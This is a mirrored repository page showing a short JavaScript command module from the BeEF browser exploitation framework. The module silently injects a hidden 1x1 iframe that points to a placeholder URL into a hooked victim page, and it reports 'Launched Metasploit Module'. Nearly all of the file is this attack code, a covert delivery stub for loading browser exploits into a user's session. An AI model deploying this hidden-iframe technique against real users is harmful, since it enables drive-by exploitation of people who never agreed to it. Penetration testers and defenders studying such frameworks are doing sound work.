mirror of
https://github.com/beefproject/beef
synced 2026-06-08 13:15:56 +00:00
03ffb4703d
git-svn-id: https://beef.googlecode.com/svn/trunk@2 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
15 lines
408 B
JavaScript
15 lines
408 B
JavaScript
// iframe.setAttribute("style", "visibility:hidden;"); doesn't work with ie
|
|
|
|
function do_main(){
|
|
var iframe = document.createElement('iframe');
|
|
iframe.src = 'URL';
|
|
iframe.setAttribute("width", "1");
|
|
iframe.setAttribute("height", "1");
|
|
iframe.setAttribute("style", "visibility:hidden;");
|
|
document.body.appendChild(iframe);
|
|
|
|
return "Launched Metasploit Module";
|
|
}
|
|
|
|
return_result(result_id, do_main());
|